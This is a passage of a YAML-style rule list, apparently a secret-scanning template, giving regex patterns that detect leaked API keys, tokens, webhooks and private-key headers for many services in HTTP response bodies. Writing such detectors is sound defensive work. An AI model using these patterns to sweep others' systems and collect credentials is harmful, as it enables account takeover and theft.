part: body + - type: regex + name: cloudflarecakey + regex: + - (?:cloudflare).{0,40}\b(v[A-Za-z0-9._-]{173,})\b + part: body + - type: regex + name: cloudimage + regex: + - (?:cloudimage).{0,40}\b([a-z0-9_]{30})\b + part: body + - type: regex + name: cloudinary_credentials + regex: + - cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+ + part: body + - type: regex + name: cloudmersive + regex: + - (?:cloudmersive).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: cloudplan + regex: + - (?:cloudplan).{0,40}\b([A-Z0-9-]{32})\b + part: body + - type: regex + name: cloverly + regex: + - (?:cloverly).{0,40}\b([a-z0-9:_]{28})\b + part: body + - type: regex + name: cloze_1 + regex: + - (?:cloze).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: cloze_2 + regex: + - (?:cloze).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b + part: body + - type: regex + name: clustdoc + regex: + - (?:clustdoc).{0,40}\b([0-9a-zA-Z]{60})\b + part: body + - type: regex + name: codacy + regex: + - (?:codacy).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: coinapi + regex: + - (?:coinapi).{0,40}\b([A-Z0-9-]{36})\b + part: body + - type: regex + name: coinbase + regex: + - (?:coinbase).{0,40}\b([a-zA-Z-0-9]{64})\b + part: body + - type: regex + name: coinlayer + regex: + - (?:coinlayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: coinlib + regex: + - (?:coinlib).{0,40}\b([a-z0-9]{16})\b + part: body + - type: regex + name: column + regex: + - (?:column).{0,40}\b((?:test|live)_[a-zA-Z0-9]{27})\b + part: body + - type: regex + name: commercejs + regex: + - (?:commercejs).{0,40}\b([a-z0-9_]{48})\b + part: body + - type: regex + name: commodities + regex: + - (?:commodities).{0,40}\b([a-zA-Z0-9]{60})\b + part: body + - type: regex + name: companyhub_1 + regex: + - (?:companyhub).{0,40}\b([0-9a-zA-Z]{20})\b + part: body + - type: regex + name: companyhub_2 + regex: + - (?:companyhub).{0,40}\b([a-zA-Z0-9$%^=-]{4,32})\b + part: body + - type: 
regex + name: confluent_1 + regex: + - (?:confluent).{0,40}\b([a-zA-Z-0-9]{16})\b + part: body + - type: regex + name: confluent_2 + regex: + - (?:confluent).{0,40}\b([a-zA-Z-0-9]{64})\b + part: body + - type: regex + name: convertkit + regex: + - (?:convertkit).{0,40}\b([a-z0-9A-Z_]{22})\b + part: body + - type: regex + name: convier + regex: + - (?:convier).{0,40}\b([0-9]{2}\|[a-zA-Z0-9]{40})\b + part: body + - type: regex + name: copper_2 + regex: + - (?:copper).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: countrylayer + regex: + - (?:countrylayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: courier + regex: + - (?:courier).{0,40}\b(pk\_[a-zA-Z0-9]{1,}\_[a-zA-Z0-9]{28})\b + part: body + - type: regex + name: coveralls + regex: + - (?:coveralls).{0,40}\b([a-zA-Z0-9-]{37})\b + part: body + - type: regex + name: crowdin + regex: + - (?:crowdin).{0,40}\b([0-9A-Za-z]{80})\b + part: body + - type: regex + name: cryptocompare + regex: + - (?:cryptocompare).{0,40}\b([a-z-0-9]{64})\b + part: body + - type: regex + name: currencycloud_1 + regex: + - (?:currencycloud).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: currencyfreaks + regex: + - (?:currencyfreaks).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: currencylayer + regex: + - (?:currencylayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: currencyscoop + regex: + - (?:currencyscoop).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: currentsapi + regex: + - (?:currentsapi).{0,40}\b([a-zA-Z0-9\S]{48})\b + part: body + - type: regex + name: customerguru_1 + regex: + - (?:guru).{0,40}\b([a-z0-9A-Z]{50})\b + part: body + - type: regex + name: customerguru_2 + regex: + - (?:guru).{0,40}\b([a-z0-9A-Z]{30})\b + part: body + - type: regex + name: d7network + regex: + - (?:d7network).{0,40}\b([a-zA-Z0-9\W\S]{23}\=) + part: body + - type: regex + name: dailyco + regex: + - (?:daily).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex 
+ name: dandelion + regex: + - (?:dandelion).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: databricks + regex: + - dapi[a-f0-9]{32}\b + part: body + - type: regex + name: datafire + regex: + - (?:datafire).{0,40}\b([a-z0-9\S]{175,190})\b + part: body + - type: regex + name: datagov + regex: + - (?:data.gov).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: deepai + regex: + - (?:deepai).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: deepgram + regex: + - (?:deepgram).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: delighted + regex: + - (?:delighted).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: deputy_1 + regex: + - \b([0-9a-z]{1,}.as.deputy.com)\b + part: body + - type: regex + name: deputy_2 + regex: + - (?:deputy).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: detectlanguage + regex: + - (?:detectlanguage).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: dfuse + regex: + - \b(web\_[0-9a-z]{32})\b + part: body + - type: regex + name: diffbot + regex: + - (?:diffbot).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: digitaloceantoken + regex: + - (?:digitalocean).{0,40}\b([A-Za-z0-9_-]{64})\b + part: body + - type: regex + name: discord_webhook + regex: + - https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+ + part: body + - type: regex + name: discordbottoken_1 + regex: + - >- + (?:discord).{0,40}\b([A-Za-z0-9_-]{24}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27})\b + part: body + - type: regex + name: discordbottoken_2 + regex: + - (?:discord).{0,40}\b([0-9]{17})\b + part: body + - type: regex + name: discordwebhook + regex: + - (https:\/\/discord.com\/api\/webhooks\/[0-9]{18}\/[0-9a-zA-Z-]{68}) + part: body + - type: regex + name: ditto + regex: + - >- + (?:ditto).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12}\.[a-z0-9]{40})\b + part: body + - type: regex + name: dnscheck_1 + regex: + - 
(?:dnscheck).{0,40}\b([a-z0-9A-Z-]{36})\b + part: body + - type: regex + name: dnscheck_2 + regex: + - (?:dnscheck).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: documo + regex: + - \b(ey[a-zA-Z0-9]{34}.ey[a-zA-Z0-9]{154}.[a-zA-Z0-9_-]{43})\b + part: body + - type: regex + name: doppler + regex: + - \b(dp\.pt\.[a-zA-Z0-9]{43})\b + part: body + - type: regex + name: dotmailer_1 + regex: + - (?:dotmailer).{0,40}\b(apiuser-[a-z0-9]{12}@apiconnector.com)\b + part: body + - type: regex + name: dotmailer_2 + regex: + - (?:dotmailer).{0,40}\b([a-zA-Z0-9\S]{8,24})\b + part: body + - type: regex + name: dovico + regex: + - (?:dovico).{0,40}\b([0-9a-z]{32}\.[0-9a-z]{1,}\b) + part: body + - type: regex + name: dronahq + regex: + - (?:dronahq).{0,40}\b([a-z0-9]{50})\b + part: body + - type: regex + name: droneci + regex: + - (?:droneci).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: dropbox + regex: + - \b(sl\.[A-Za-z0-9\-\_]{130,140})\b + part: body + - type: regex + name: dwolla + regex: + - (?:dwolla).{0,40}\b([a-zA-Z-0-9]{50})\b + part: body + - type: regex + name: dynalist + regex: + - (?:dynalist).{0,40}\b([a-zA-Z0-9-_]{128})\b + part: body + - type: regex + name: dynatrace_token + regex: + - dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64} + part: body + - type: regex + name: dyspatch + regex: + - (?:dyspatch).{0,40}\b([A-Z0-9]{52})\b + part: body + - type: regex + name: ec + regex: + - '-----BEGIN EC PRIVATE KEY-----' + part: body + - type: regex + name: eagleeyenetworks_1 + regex: + - >- + (?:eagleeyenetworks).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: eagleeyenetworks_2 + regex: + - (?:eagleeyenetworks).{0,40}\b([a-zA-Z0-9]{15})\b + part: body + - type: regex + name: easyinsight_1 + regex: + - (?:easyinsight|easy-insight).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: easyinsight_2 + regex: + - (?:easyinsight|easy-insight).{0,40}\b([0-9Aa-zA-Z]{20})\b + 
part: body + - type: regex + name: edamam_1 + regex: + - (?:edamam).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: edamam_2 + regex: + - (?:edamam).{0,40}\b([0-9a-z]{8})\b + part: body + - type: regex + name: edenai + regex: + - >- + (?:edenai).{0,40}\b([a-zA-Z0-9]{36}.[a-zA-Z0-9]{92}.[a-zA-Z0-9_]{43})\b + part: body + - type: regex + name: eightxeight_2 + regex: + - (?:8x8).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: elasticemail + regex: + - (?:elastic).{0,40}\b([A-Za-z0-9_-]{96})\b + part: body + - type: regex + name: enablex_1 + regex: + - (?:enablex).{0,40}\b([a-zA-Z0-9]{36})\b + part: body + - type: regex + name: enablex_2 + regex: + - (?:enablex).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: enigma + regex: + - (?:enigma).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: ethplorer + regex: + - (?:ethplorer).{0,40}\b([a-z0-9A-Z-]{22})\b + part: body + - type: regex + name: everhour + regex: + - >- + (?:everhour).{0,40}\b([0-9Aa-f]{4}-[0-9a-f]{4}-[0-9a-f]{6}-[0-9a-f]{6}-[0-9a-f]{8})\b + part: body + - type: regex + name: exchangerateapi + regex: + - (?:exchangerate).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: exchangeratesapi + regex: + - (?:exchangerates).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: facebook_access_token + regex: + - EAACEdEose0cBA[0-9A-Za-z]+ + part: body + - type: regex + name: faceplusplus + regex: + - (?:faceplusplus).{0,40}\b([0-9a-zA-Z_-]{32})\b + part: body + - type: regex + name: fakejson + regex: + - (?:fakejson).{0,40}\b([a-zA-Z0-9]{22})\b + part: body + - type: regex + name: fastforex + regex: + - (?:fastforex).{0,40}\b([a-z0-9-]{28})\b + part: body + - type: regex + name: fastlypersonaltoken + regex: + - (?:fastly).{0,40}\b([A-Za-z0-9_-]{32})\b + part: body + - type: regex + name: feedier + regex: + - (?:feedier).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: fetchrss + regex: + - 
(?:fetchrss).{0,40}\b([0-9A-Za-z.]{40})\b + part: body + - type: regex + name: figmapersonalaccesstoken + regex: + - >- + (?:figma).{0,40}\b([0-9]{6}-[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: fileio + regex: + - (?:fileio).{0,40}\b([A-Z0-9.-]{39})\b + part: body + - type: regex + name: finage + regex: + - \b(API_KEY[0-9A-Z]{32})\b + part: body + - type: regex + name: financialmodelingprep + regex: + - (?:financialmodelingprep).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: findl + regex: + - >- + (?:findl).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b + part: body + - type: regex + name: finnhub + regex: + - (?:finnhub).{0,40}\b([0-9a-z]{20})\b + part: body + - type: regex + name: fixerio + regex: + - (?:fixer).{0,40}\b([A-Za-z0-9]{32})\b + part: body + - type: regex + name: flatio + regex: + - (?:flat).{0,40}\b([0-9a-z]{128})\b + part: body + - type: regex + name: fleetbase + regex: + - \b(flb_live_[0-9a-zA-Z]{20})\b + part: body + - type: regex + name: flickr + regex: + - (?:flickr).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: flightapi + regex: + - (?:flightapi).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: flightstats_1 + regex: + - (?:flightstats).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: flightstats_2 + regex: + - (?:flightstats).{0,40}\b([0-9a-z]{8})\b + part: body + - type: regex + name: flowflu_2 + regex: + - (?:flowflu).{0,40}\b([a-zA-Z0-9]{51})\b + part: body + - type: regex + name: flutterwave + regex: + - \b(FLWSECK-[0-9a-z]{32}-X)\b + part: body + - type: regex + name: fmfw_1 + regex: + - (?:fmfw).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: fmfw_2 + regex: + - (?:fmfw).{0,40}\b([a-zA-Z0-9_-]{32})\b + part: body + - type: regex + name: formbucket + regex: + - >- + (?:formbucket).{0,40}\b([0-9A-Za-z]{1,}.[0-9A-Za-z]{1,}\.[0-9A-Z-a-z\-_]{1,}) + part: body + - type: regex + 
name: formio + regex: + - >- + (?:formio).{0,40}\b(eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\.[0-9A-Za-z]{310}\.[0-9A-Z-a-z\-_]{43}[ + \r\n]{1}) + part: body + - type: regex + name: foursquare + regex: + - (?:foursquare).{0,40}\b([0-9A-Z]{48})\b + part: body + - type: regex + name: frameio + regex: + - \b(fio-u-[0-9a-zA-Z_-]{64})\b + part: body + - type: regex + name: freshbooks_1 + regex: + - (?:freshbooks).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: freshbooks_2 + regex: + - (?:freshbooks).{0,40}\b(https://www.[0-9A-Za-z_-]{1,}.com)\b + part: body + - type: regex + name: freshdesk_1 + regex: + - (?:freshdesk).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: freshdesk_2 + regex: + - \b([0-9a-z-]{1,}.freshdesk.com)\b + part: body + - type: regex + name: front + regex: + - (?:front).{0,40}\b([0-9a-zA-Z]{36}.[0-9a-zA-Z\.\-\_]{188,244})\b + part: body + - type: regex + name: fulcrum + regex: + - (?:fulcrum).{0,40}\b([a-z0-9]{80})\b + part: body + - type: regex + name: fullstory + regex: + - (?:fullstory).{0,40}\b([a-zA-Z-0-9/+]{88})\b + part: body + - type: regex + name: fusebill + regex: + - (?:fusebill).{0,40}\b([a-zA-Z0-9]{88})\b + part: body + - type: regex + name: fxmarket + regex: + - (?:fxmarket).{0,40}\b([0-9Aa-zA-Z-_=]{20})\b + part: body + - type: regex + name: gcp + regex: + - \{[^{]+auth_provider_x509_cert_url[^}]+\} + part: body + - type: regex + name: geckoboard + regex: + - (?:geckoboard).{0,40}\b([a-zA-Z0-9]{44})\b + part: body + - type: regex + name: generic_1376 + regex: + - jdbc:mysql(=| =|:| :) + part: body + - type: regex + name: generic_1700 + regex: + - BEGIN OPENSSH PRIVATE KEY + part: body + - type: regex + name: generic_1701 + regex: + - BEGIN PRIVATE KEY + part: body + - type: regex + name: generic_1702 + regex: + - BEGIN RSA PRIVATE KEY + part: body + - type: regex + name: generic_1703 + regex: + - BEGIN DSA PRIVATE KEY + part: body + - type: regex + name: generic_1704 + regex: + - BEGIN EC PRIVATE KEY + part: 
body + - type: regex + name: generic_1705 + regex: + - BEGIN PGP PRIVATE KEY BLOCK + part: body + - type: regex + name: generic_1710 + regex: + - algolia_api_key + part: body + - type: regex + name: generic_1711 + regex: + - asana_access_token + part: body + - type: regex + name: generic_1713 + regex: + - azure_tenant + part: body + - type: regex + name: generic_1714 + regex: + - bitly_access_token + part: body + - type: regex + name: generic_1716 + regex: + - browserstack_access_key + part: body + - type: regex + name: generic_1717 + regex: + - buildkite_access_token + part: body + - type: regex + name: generic_1718 + regex: + - comcast_access_token + part: body + - type: regex + name: generic_1719 + regex: + - datadog_api_key + part: body + - type: regex + name: generic_1720 + regex: + - deviantart_secret + part: body + - type: regex + name: generic_1721 + regex: + - deviantart_access_token + part: body + - type: regex + name: generic_1722 + regex: + - dropbox_api_token + part: body + - type: regex + name: generic_1723 + regex: + - facebook_appsecret + part: body + - type: regex + name: generic_1724 + regex: + - facebook_access_token + part: body + - type: regex + name: generic_1725 + regex: + - firebase_custom_token + part: body + - type: regex + name: generic_1726 + regex: + - firebase_id_token + part: body + - type: regex + name: generic_1727 + regex: + - github_client + part: body + - type: regex + name: generic_1728 + regex: + - github_ssh_key + part: body + - type: regex + name: generic_1730 + regex: + - gitlab_private_token + part: body + - type: regex + name: generic_1733 + regex: + - heroku_api_key + part: body + - type: regex + name: generic_1734 + regex: + - instagram_access_token + part: body + - type: regex + name: generic_1735 + regex: + - mailchimp_api_key + part: body + - type: regex + name: generic_1736 + regex: + - mailgun_api_key + part: body + - type: regex + name: generic_1739 + regex: + - pagerduty_api_token + part: body + - type: regex + 
name: generic_1740
+ regex:
+ - paypal_key_sb
+ part: body
+ - type: regex
+ name: generic_1741
+ regex:
+ - paypal_key_live
+ part: body
+ - type: regex
+ name: generic_1742
+ regex:
+ - paypal_token_sb
+ part: body
+ - type: regex
+ name: generic_1743
+ regex:
+ - paypal_token_live
+ part: body
+ - type: regex
+ name: generic_1744
+ regex:
+ - pendo_integration_key
+ part: body
+ - type: regex
+ name: generic_1745
+ regex:
+ - salesforce_access_token
+ part: body
+ - type: regex
+ name: generic_1746
+ regex:
+ - saucelabs_ukey
+ part: body
+ - type: regex
+ name: generic_1747
+ regex:
+ - sendgrid_api_key
+ part: body
+ - type: regex
+ name: generic_1748
+ regex:
+ - slack_api_token
+ part: body
+ - type: regex
+ name: generic_1751
+ regex:
+ - square_auth_token
+ part: body
+ - type: regex
+ name: generic_1752
+ regex:
+ - travisci_api_token
+ part: body
+ - type: regex
+ name: generic_1754
+ regex:
+ - twitter_api_secret
+ part: body
+ - type: regex
+ name: generic_1755
+ regex:
+ - twitter_bearer_token
+ part: body
+ - type: regex
+ name: generic_1756
+ regex:
+ - spotify_access_token
+ part: body
+ - type: regex
+ name: generic_1757
+ regex:
+ - stripe_key_live
+ part: body
+ - type: regex
+ name: generic_1758
+ regex:
+ - wakatime_api_key
+ part: body
+ - type: regex
+ name: generic_1759
+ regex:
+ - wompi_auth_bearer_sb
+ part: body
+ - type: regex
+ name: generic_1760
+ regex:
+ - wompi_auth_bearer_live
+ part: body
+ - type: regex
+ name: generic_1761
+ regex:
+ - wpengine_api_key
+ part: body
+ - type: regex
+ name: generic_1763
+ regex:
+ - zendesk_access_token
+ part: body
+ - type: regex
+ name: generic_1764
+ regex:
+ - ssh-rsa
+ part: body
+ - type: regex
+ name: gengo
+ regex:
+ - >-
+ (?:gengo).{0,40}([ ]{0,1}[0-9a-zA-Z\[\]\-\(\)\{\}|_^@$=~]{64}[
+ \r\n]{1})
+ part: body
+ - type: regex
+ name: geoapify
+ regex:
+ - (?:geoapify).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: geocode
+ regex:
+ - (?:geocode).{0,40}\b([a-z0-9]{28})\b
+ part: body
+ - type: regex
+ name: geocodify
+ regex:
+ - (?:geocodify).{0,40}\b([0-9a-z]{40})\b
+ part: body
+ - type: regex
+ name: geocodio_2
+ regex:
+ - (?:geocod).{0,40}\b([a-z0-9]{39})\b
+ part: body
+ - type: regex
+ name: geoipifi
+ regex:
+ - (?:ipifi).{0,40}\b([a-z0-9A-Z_]{32})\b
+ part: body
+ - type: regex
+ name: getemail
+ regex:
+ - (?:getemail).{0,40}\b([a-zA-Z0-9-]{20})\b
+ part: body
+ - type: regex
+ name: getemails_1
+ regex:
+ - (?:getemails).{0,40}\b([a-z0-9-]{26})\b
+ part: body
+ - type: regex
+ name: getemails_2
+ regex:
+ - (?:getemails).{0,40}\b([a-z0-9-]{18})\b
+ part: body
+ - type: regex
+ name: getgeoapi
+ regex:
+ - (?:getgeoapi).{0,40}\b([0-9a-z]{40})\b
+ part: body
+ - type: regex
+ name: getgist
+ regex:
+ - (?:getgist).{0,40}\b([a-z0-9A-Z+=]{68})
+ part: body
+ - type: regex
+ name: getsandbox_1
+ regex:
+ - (?:getsandbox).{0,40}\b([a-z0-9-]{40})\b
+ part: body
+ - type: regex
+ name: getsandbox_2
+ regex:
+ - (?:getsandbox).{0,40}\b([a-z0-9-]{15,30})\b
+ part: body
+ - type: regex
+ name: github_2
+ regex:
+ - \b((?:ghp|gho|ghu|ghs|ghr)_[a-zA-Z0-9]{36,255}\b)
+ part: body
+ - type: regex
+ name: github_app_token
+ regex:
+ - (ghu|ghs)_[0-9a-zA-Z]{36}
+ part: body
+ - type: regex
+ name: github_oauth_access_token
+ regex:
+ - gho_[0-9a-zA-Z]{36}
+ part: body
+ - type: regex
+ name: github_personal_access_token
+ regex:
+ - ghp_[0-9a-zA-Z]{36}
+ part: body
+ - type: regex
+ name: github_refresh_token
+ regex:
+ - ghr_[0-9a-zA-Z]{76}
+ part: body
+ - type: regex
+ name: github_old
+ regex:
+ - (?:github)[^\.].{0,40}[ =:'"]+([a-f0-9]{40})\b
+ part: body
+ - type: regex
+ name: githubapp_2
+ regex:
+ - >-
+ (?:github).{0,40}(-----BEGIN RSA PRIVATE
+ KEY-----\s[A-Za-z0-9+\/\s]*\s-----END RSA PRIVATE KEY-----)
+ part: body
+ - type: regex
+ name: gitlabv2
+ regex:
+ - \b(glpat-[a-zA-Z0-9\-=_]{20,22})\b
+ part: body
+ - type: regex
+ name: gitter
+ regex:
+ - (?:gitter).{0,40}\b([a-z0-9-]{40})\b
+ part: body
+ - type: regex
+ name: glassnode
+ regex:
+ - (?:glassnode).{0,40}\b([0-9A-Za-z]{27})\b
+ part: body
+ - type: regex
+ name: gocanvas_1
+ regex:
+ - (?:gocanvas).{0,40}\b([0-9A-Za-z/+]{43}=[ \r\n]{1})
+ part: body
+ - type: regex
+ name: gocanvas_2
+ regex:
+ - (?:gocanvas).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b
+ part: body
+ - type: regex
+ name: gocardless
+ regex:
+ - \b(live_[0-9A-Za-z\_\-]{40}[ "'\r\n]{1})
+ part: body
+ - type: regex
+ name: goodday
+ regex:
+ - (?:goodday).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: google_gcp_service_account
+ regex:
+ - '"type": "service_account"'
+ part: body
+ - type: regex
+ name: google_api_key
+ regex:
+ - AIza[0-9a-z-_]{35}
+ part: body
+ - type: regex
+ name: google_calendar_uri
+ regex:
+ - https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+
+ part: body
+ - type: regex
+ name: google_oauth_access_token
+ regex:
+ - ya29\.[0-9A-Za-z\-_]+
+ part: body
+ - type: regex
+ name: graphcms_1
+ regex:
+ - (?:graph).{0,40}\b([a-z0-9]{25})\b
+ part: body
+ - type: regex
+ name: graphcms_2
+ regex:
+ - \b(ey[a-zA-Z0-9]{73}.ey[a-zA-Z0-9]{365}.[a-zA-Z0-9_-]{683})\b
+ part: body
+ - type: regex
+ name: graphhopper
+ regex:
+ - (?:graphhopper).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: groovehq
+ regex:
+ - (?:groove).{0,40}\b([a-z0-9A-Z]{64})
+ part: body
+ - type: regex
+ name: guru_1
+ regex:
+ - >-
+ (?:guru).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b
+ part: body
+ - type: regex
+ name: guru_2
+ regex:
+ - >-
+ (?:guru).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: gyazo
+ regex:
+ - (?:gyazo).{0,40}\b([0-9A-Za-z-]{43})\b
+ part: body
+ - type: regex
+ name: happi
+ regex:
+ - (?:happi).{0,40}\b([a-zA-Z0-9]{56})
+ part: body
+ - type: regex
+ name: happyscribe
+ regex:
+ - (?:happyscribe).{0,40}\b([0-9a-zA-Z]{24})\b
+ part: body
+ - type: regex
+ name: harvest_1
+ regex:
+ - (?:harvest).{0,40}\b([a-z0-9A-Z._]{97})\b
+ part: body
+ - type: regex
+ name: hellosign
+ regex:
+ - (?:hellosign).{0,40}\b([a-zA-Z-0-9/+]{64})\b
+ part: body
+ - type: regex
+ name: helpcrunch
+ regex:
+ - (?:helpcrunch).{0,40}\b([a-zA-Z-0-9+/=]{328})
+ part: body
+ - type: regex
+ name: helpscout
+ regex:
+ - (?:helpscout).{0,40}\b([A-Za-z0-9]{56})\b
+ part: body
+ - type: regex
+ name: hereapi
+ regex:
+ - (?:hereapi).{0,40}\b([a-zA-Z0-9\S]{43})\b
+ part: body
+ - type: regex
+ name: heroku
+ regex:
+ - >-
+ (?:heroku).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b
+ part: body
+ - type: regex
+ name: hive_2
+ regex:
+ - (?:hive).{0,40}\b([0-9A-Za-z]{17})\b
+ part: body
+ - type: regex
+ name: hiveage
+ regex:
+ - (?:hiveage).{0,40}\b([0-9A-Za-z\_\-]{20})\b
+ part: body
+ - type: regex
+ name: holidayapi
+ regex:
+ - (?:holidayapi).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: html2pdf
+ regex:
+ - (?:html2pdf).{0,40}\b([a-zA-Z0-9]{64})\b
+ part: body
+ - type: regex
+ name: hubspotapikey
+ regex:
+ - >-
+ (?:hubspot).{0,40}\b([A-Za-z0-9]{8}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{4}\-[A-Za-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: humanity
+ regex:
+ - (?:humanity).{0,40}\b([0-9a-z]{40})\b
+ part: body
+ - type: regex
+ name: hypertrack_1
+ regex:
+ - (?:hypertrack).{0,40}\b([0-9a-zA-Z\_\-]{54})\b
+ part: body
+ - type: regex
+ name: hypertrack_2
+ regex:
+ - (?:hypertrack).{0,40}\b([0-9a-zA-Z\_\-]{27})\b
+ part: body
+ - type: regex
+ name: ibmclouduserkey
+ regex:
+ - (?:ibm).{0,40}\b([A-Za-z0-9_-]{44})\b
+ part: body
+ - type: regex
+ name: iconfinder
+ regex:
+ - (?:iconfinder).{0,40}\b([a-zA-Z0-9]{64})\b
+ part: body
+ - type: regex
+ name: iexcloud
+ regex:
+ - (?:iexcloud).{0,40}\b([a-z0-9_]{35})\b
+ part: body
+ - type: regex
+ name: imagekit
+ regex:
+ - (?:imagekit).{0,40}\b([a-zA-Z0-9_=]{36})
+ part: body
+ - type: regex
+ name: imagga
+ regex:
+ - (?:imagga).{0,40}\b([a-z0-9A-Z=]{72})
+ part: body
+ - type: regex
+ name: impala
+ regex:
+ - (?:impala).{0,40}\b([0-9A-Za-z_]{46})\b
+ part: body
+ - type: regex
+ name: insightly
+ regex:
+ - (?:insightly).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: integromat
+ regex:
+ - (?:integromat).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: intrinio
+ regex:
+ - (?:intrinio).{0,40}\b([a-zA-Z0-9]{44})\b
+ part: body
+ - type: regex
+ name: invoiceocean_1
+ regex:
+ - (?:invoiceocean).{0,40}\b([0-9A-Za-z]{20})\b
+ part: body
+ - type: regex
+ name: invoiceocean_2
+ regex:
+ - \b([0-9a-z]{1,}.invoiceocean.com)\b
+ part: body
+ - type: regex
+ name: ipapi
+ regex:
+ - (?:ipapi).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: ipgeolocation
+ regex:
+ - (?:ipgeolocation).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: ipify
+ regex:
+ - (?:ipify).{0,40}\b([a-zA-Z0-9_-]{32})\b
+ part: body
+ - type: regex
+ name: ipinfodb
+ regex:
+ - (?:ipinfodb).{0,40}\b([a-z0-9]{64})\b
+ part: body
+ - type: regex
+ name: ipquality
+ regex:
+ - (?:ipquality).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: ipstack
+ regex:
+ - (?:ipstack).{0,40}\b([a-fA-f0-9]{32})\b
+ part: body
+ - type: regex
+ name: jdbc_connection_string
+ regex:
+ - jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+
+ part: body
+ - type: regex
+ name: jiratoken_1
+ regex:
+ - (?:jira).{0,40}\b([a-zA-Z-0-9]{24})\b
+ part: body
+ - type: regex
+ name: jiratoken_2
+ regex:
+ - (?:jira).{0,40}\b([a-zA-Z-0-9]{5,24}\@[a-zA-Z-0-9]{3,16}\.com)\b
+ part: body
+ - type: regex
+ name: jotform
+ regex:
+ - (?:jotform).{0,40}\b([0-9Aa-z]{32})\b
+ part: body
+ - type: regex
+ name: jumpcloud
+ regex:
+ - (?:jumpcloud).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: juro
+ regex:
+ - (?:juro).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: kanban_1
+ regex:
+ - (?:kanban).{0,40}\b([0-9A-Z]{12})\b
+ part: body
+ - type: regex
+ name: kanban_2
+ regex:
+ - \b([0-9a-z]{1,}.kanbantool.com)\b
+ part: body
+ - type: regex
+ name: karmacrm
+ regex:
+ - (?:karma).{0,40}\b([a-zA-Z0-9]{20})\b
+ part: body
+ - type: regex
+ name: keenio_1
